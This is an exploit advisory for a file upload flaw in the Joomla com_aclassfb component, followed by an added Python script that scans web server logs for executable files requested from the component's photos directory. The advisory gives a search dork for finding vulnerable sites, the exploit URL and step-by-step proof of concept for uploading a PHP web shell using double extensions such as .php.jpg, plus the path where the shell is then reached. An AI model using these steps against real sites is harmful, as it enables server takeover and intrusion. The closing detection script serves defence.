A vulnerability has been discovered in the Aclassfb component.
Exploit details:
- Title : Joomla com_aclassfb File Upload Vulnerability
- Category : Web Applications
- Type : PHP
- Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
- Tested : Mozilla, Chrome, Opera -> Windows & Linux
- Vulnerability : File Upload
- Dork : inurl:com_aclassfb
File Upload: http://127.0.0.1/index.php?option=com_aclassfb
Exploit : http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
POC :
- Select a category
- After selecting a category, click “Post New Ad”: http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
- Upload Your Shell
extension : .php .php.jpg / etc
Shell Access :
http://127.0.0.1/component/com_aclassfb/photos/
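
For defenders, a log check for the pattern described above: requests to the component's photos directory for files that carry a PHP-executable extension anywhere in the name, including double extensions such as `.php.jpg`. This is an added example, not part of the original advisory; the extension list, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Extensions a PHP-enabled server may hand to the interpreter (assumed list;
# adjust to the handlers configured on your server).
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
# Upload directory named in the advisory.
PHOTOS_DIR = "/component/com_aclassfb/photos/"
# Minimal parser for the Apache/nginx "combined" access log format (assumed).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def has_exec_extension(filename):
    """True if ANY dot-separated part after the base name is executable.
    Checking only the final extension misses names like x.php.jpg, which some
    Apache handler configurations still pass to PHP."""
    parts = filename.lower().rstrip(". ").split(".")
    return any(p.strip() in EXEC_EXTS for p in parts[1:])

def suspicious_requests(lines):
    """Return (client, method, path, status) for each request to the photos
    directory whose file name carries an executable extension."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        client, method, target, status = m.groups()
        path = unquote(urlsplit(target).path)  # drop query, decode %2E etc.
        if PHOTOS_DIR not in path:
            continue
        if has_exec_extension(path.rsplit("/", 1)[-1]):
            hits.append((client, method, path, int(status)))
    return hits

# Constructed sample log lines (documentation IP ranges, invented file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /component/com_aclassfb/photos/car.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /component/com_aclassfb/photos/ad1.php.jpg?c=1 HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /component/com_aclassfb/photos/x%2Ephtml HTTP/1.1" 404 196 "-" "-"',
    '192.0.2.10 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?option=com_aclassfb HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same `has_exec_extension` check can be applied to file names at upload time; a 200 status on a flagged request means the file exists and was served, which warrants inspecting the photos directory.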